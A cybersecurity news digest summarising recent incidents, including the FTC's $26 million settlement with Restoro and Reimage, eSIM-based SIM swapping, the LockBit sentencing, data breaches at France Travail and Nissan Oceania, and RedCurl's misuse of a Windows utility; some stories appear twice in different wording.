Daily Brief

Restoro and Reimage, two Cyprus-based tech support businesses, settled with the FTC for $26 million after being accused of running a Windows antivirus scam. The FTC claimed these firms strong-armed consumers into paying for unnecessary cleanup services and software by using scare tactics. FTC's undercover agents purchased services from the companies, revealing that the firms falsely claimed the agents' PCs needed extensive additional repairs. The scam particularly targeted older individuals, deceiving them into free performance checks that led to fabricated issues and high fees for remote services. The FTC charges included violations of deceptive representation under the FTC Act and deceptive calls under the Telemarketing Sales Rule. Although Restoro and Reimage have not admitted to any wrongdoing, they have ceased new transactions and renewals, according to a supposed FAQ on their websites, which are currently not accessible. The FTC's undercover investigation involved purchasing and testing the suspect services, verifying these allegations of fraud firsthand.

SIM swappers are now targeting eSIMs to port victims' phone numbers to devices under their control. eSIMs (Embedded Subscriber Identity Modules) are digital, can be reprogrammed remotely, and are becoming prevalent in modern smartphones and wearables. Cybersecurity firm F.A.C.C.T. observed over a hundred attempts at one financial organization to gain access to personal accounts through eSIM hijacking. Attackers gain control of a user's service provider account, generate a QR code for a new eSIM, and scan it to transfer the victim's phone number to their device. Once attackers hijack the phone number, they can receive access codes and two-factor authentication tokens, allowing them to access bank accounts and other secure services. Cybercriminals also exploit the hijacked number for scams in messenger apps by impersonating the victim. Traditional SIM swapping involved social engineering or insider assistance but is now shifting towards exploiting newer technologies like eSIMs. Experts recommend strong, unique passwords and two-factor authentication for service provider accounts, and suggest using physical keys or authenticator apps for critical accounts.

Mikhail Vasiliev, a Canadian-Russian dual national and key figure within the LockBit ransomware group, has been sentenced to nearly four years in prison by a Canadian court. Vasiliev has been ordered to pay restitution exceeding CA$860,000 to some victims and faces extradition to the United States for additional charges. He pleaded guilty to cyber-extortion, mischief, and weapons charges related to attacks on Canadian businesses. The LockBit ransomware group has extorted over $120 million since 2020, targeting over 2,000 victims. Despite takedowns of LockBit's infrastructure earlier this year, the group remains active, with new victim listings appearing shortly after the law enforcement actions. Few LockBit members have been apprehended; Vasiliev is one of just three individuals named, with only one other arrested. Law enforcement found evidence at Vasiliev's home linking him to LockBit's operations, including a target list and communications with the group's leader. Vasiliev's transition to cybercrime was purportedly influenced by the isolation during the pandemic, according to his defense lawyer.

Hackers have updated their techniques to execute SIM swap attacks using eSIM technology. eSIMs are digital SIM cards embedded in mobile devices, offering the same functionalities as traditional SIMs but with the ability to be reprogrammed remotely. Cybersecurity firm F.A.C.C.T. reports numerous attempts by fraudsters to take over online service accounts, particularly targeting a financial organization. Attackers gain control of a user's service provider account to port the victim's phone number to a device with an eSIM, thereafter gaining access to the victim's calls and messages. Once in possession of the phone number, criminals can intercept access codes and two-factor authentication tokens, compromising bank accounts and other sensitive services. Fraudsters can also access and manipulate the victim's messaging accounts, further spreading scams and requesting money from contacts. Security experts advise using complex passwords, enabling two-factor authentication for provider accounts, and considering additional protective measures like physical security keys for critical accounts like e-banking and crypto wallets.

Google has upgraded its Safe Browsing service, providing real-time online threat protection while maintaining user privacy. The enhanced service prevents Chrome users from leaking browsing history to Google, addressing privacy concerns. Standard Safe Browsing now offers more comprehensive, real-time data checks, similar to the previously more private Enhanced version. The system uses hash-based checks and Oblivious HTTP (OHTTP) protocol to anonymously verify site safety without revealing user identity. Fastly's privacy servers play a role in stripping identifiable information before forwarding data to Google's Safe Browsing server. This update is significant due to the increasing number of unsafe sites which appear and disappear within minutes, surpassing the effectiveness of static lists. Password Checkup feature on iOS will also warn about weak and reused passwords, enhancing user security further.

Tech support companies Restoro and Reimage agree to pay $26 million to settle FTC charges of deceptive marketing and scare tactics. The two firms misled customers with false computer threat alerts to sell unnecessary repair services, exploiting particularly older consumers. The Federal Trade Commission (FTC) found that online ads and pop-ups from these companies fraudulently impersonated Microsoft system warnings. FTC investigations revealed the companies' diagnostics software claimed non-existent issues, prompting unnecessary purchases of repair plans. Despite claims of serious computer issues, telemarketers would then upsell more expensive repair plans after remote access to consumers' computers. The proposed FTC order, awaiting court approval, prohibits the companies from continuing their deceptive marketing and scare tactics. The FTC's recent actions also include banning Avast from selling browsing data and imposing restrictions on other companies for misleading practices.

France's unemployment department, France Travail, reported a significant data breach affecting data dating back 20 years and up to 43 million individuals. Exposed information includes names, birth dates, social security numbers, and contact details, while passwords and banking details remain secure. The breach occurred between February 6 and March 5, and French citizens are advised to be vigilant against phishing attacks. The Cybercrime Brigade of the Paris Judicial Police is investigating the incident, believed to involve a combination of social engineering and technical attack vectors. France Travail is working to notify affected individuals and has promised to strengthen its cybersecurity measures in response to increasing threats. This breach comes on the heels of other significant French data breaches and DDoS attacks on government departments, suggesting a rise in cyber threats against France. France Travail's breach is now considered the largest in the country's history, eclipsing the previous record set by breaches at Viamedis and Almerys.

Google is set to update its Safe Browsing feature in Chrome, providing real-time phishing and malware protection. The protection will be available without compromising user privacy, utilizing encryption and privacy-enhancing techniques. The updated Safe Browsing will counter transient malicious websites by checking against server-side lists in real-time, aiming to block 25% more phishing attempts. This feature will also extend to Android devices, ensuring widespread security across different platforms. An "Enhanced Protection" mode is available for users seeking proactive defense, leveraging AI for deeper scans of downloads. User privacy is maintained through Fastly Oblivious HTTP (OHTTP) relays, which hide IP addresses and mix user requests to prevent identity matching. Google ensures that no single entity, including themselves or Fastly, can decrypt both the URL hash prefixes and the originating IP addresses, reinforcing user privacy.

The Cybercrime Atlas initiative has moved into its operational phase in 2024 with aims to map and disrupt global cybercriminal activities. Launched by the World Economic Forum (WEF) in 2023, the project involves public-private collaboration, including major players like Banco Santander, Fortinet, Microsoft, and PayPal. The initiative now counts over 20 law enforcement agencies, security firms, financial institutions, NGOs, and academics among its members. The group aims to target the infrastructure of cybercriminal groups, facilitate arrests, and attribute attacks, thus hindering their operations and profitability. Despite previous takedowns, cybercrime persists, with recent ransomware attacks on America's healthcare system and the British Library emphasizing the urgency of this initiative. The Cybercrime Atlas seeks to create actionable intelligence to challenge cybercriminals and has placed cyber threats on the agenda for CEOs and boards. The WEF is also addressing the cybersecurity skills gap and engaging non-cybersecurity audiences in discussions on combating ransomware and improving organizational cybersecurity resilience.

The US Department of Health and Human Services is starting an investigation into Change Healthcare after a reported 6 TB data theft by the ALPHV ransomware group. Change Healthcare's recovery from the cyberattack is underway, with critical services including prescription processing and insurance claims slowly coming back online. ALPHV claimed responsibility for the attack and the theft of sensitive data, which may include health information of US military personnel and payment details. The actual contents of the stolen data have not been confirmed by Change Healthcare, and security experts have detected a $22 million Bitcoin transaction possibly linked to the ransomware payment. Multiple class action lawsuits have been filed against Change Healthcare, and there is a move to consolidate these cases to streamline litigation processes. The cybersecurity measures of Change Healthcare are under scrutiny to check compliance with HIPAA data protection and privacy rules, following the breach.

A Russian-Canadian man, Mikhail Vasiliev, has been sentenced to nearly four years in prison in Canada for participating in the LockBit ransomware operation. Vasiliev was arrested in November 2022, following a search of his home where authorities found evidence of his involvement in cyber extortion. He pleaded guilty to multiple charges, including cyber extortion, and is responsible for paying more than $860,000 in restitution to victims. Vasiliev was labeled a "cyber terrorist" by Justice Michelle Fuerst, who highlighted his motivation by greed during the pandemic. LockBit's operations were severely impacted in February 2024 when law enforcement seized its infrastructure and arrested three affiliates. Meanwhile, a federal jury in Washington D.C. convicted Roman Sterlingov for laundering money through Bitcoin Fog, a service used to launder profits from various crimes including computer related offenses and theft.

France Travail, the French unemployment agency, disclosed a significant data breach impacting 43 million individuals. Hackers targeted the agency's systems between February 6 and March 5, accessing personal data of job seekers registered over the past 20 years. Exposed data includes job candidate profiles, increasing the risk of identity theft and phishing attacks among the affected individuals. Although bank details and passwords were not compromised, the exposed information could be combined with other breaches by cybercriminals. Notifications will be sent to potentially impacted individuals, and the agency emphasizes heightened vigilance regarding communication they receive. The National Commission of Informatique and Liberties (CNIL) is involved and has been notified of the breach's extent. Victims can file a complaint with the Paris prosecutor’s office, aiding in the investigation of the breach. This breach surpasses the previous largest in France, both in scope and number of individuals affected.

Nissan Oceania experienced a cyberattack in December 2023, with the Akira ransomware group claiming responsibility. The attack resulted in a significant data breach involving personal information of around 100,000 current and former employees and customers. Compromised data includes government identification such as Medicare cards, driver's licenses, passports, and tax file numbers, as well as loan documents and employment details. Akira has already leaked some of the stolen data on the dark web. Nissan is in the process of contacting the affected individuals directly to provide details and support, with efforts to reduce redundancies in the contact list. Up to 10% of the impacted individuals had their government IDs exposed, and the remaining had other personal data compromised. Nissan is offering free identity protection services, credit monitoring, and reimbursement for replacing compromised government IDs to support those affected. Customers are advised to exercise increased vigilance for potential scams, to use multi-factor authentication, and update their passwords regularly.

A high-severity vulnerability in Kubernetes which allowed remote code execution on Windows nodes has been disclosed. Identified as CVE-2023-5528, the vulnerability affected kubelet versions starting from 1.8.0. The flaw was patched on November 14, 2023, and is specific to Kubernetes clusters using in-tree storage plugins for Windows nodes. Exploitation could result in an attacker gaining SYSTEM privileges and potential full control over all Windows nodes within a cluster. The vulnerability stems from using insecure function calls and lack of input sanitization, particularly when mounting local volumes in a pod. Kubernetes developers have replaced the vulnerable command line call with a native Gö function to remove injection risks. The disclosure is accompanied by news of a separate critical security flaw in Uniview ISC camera model 2500-S being exploited to spread the NetKiller Mirai botnet variant.

The Russian-speaking cybercrime group, RedCurl, has been exploiting the legitimate Windows Program Compatibility Assistant (PCA) for corporate espionage. The PCA tool (pcalua.exe), which resolves compatibility issues with older programs, is being manipulated for command execution and security bypass. RedCurl, operating since 2018, has targeted organizations in multiple countries, including Australia, Canada, Germany, Russia, the U.K., and the U.S., to steal corporate secrets and employee data. The attack begins with phishing emails containing malicious .ISO or .IMG attachments, which initiate a multi-stage process involving cmd.exe and a legitimate curl utility to deliver a loader (ms.dll or ps.dll). The malicious DLL exploits PCA to start a downloader process, which establishes a connection to fetch the loader; the Impacket open-source tool is also used for further unauthorized command execution. Connections to the RedCurl group are evident from shared command-and-control infrastructure and similar downloader artifacts used previously. Trend Micro's report highlights the group’s sophisticated tactics aimed at evading detection, including misusing PowerShell, curl, and PCA. Meanwhile, the Russian nation-state group Turla has been implementing a new Pelmeni wrapper DLL that deploys the Kazuar backdoor through DLL side-loading techniques, signifying an overarching theme of advanced threat groups employing evasive maneuvers.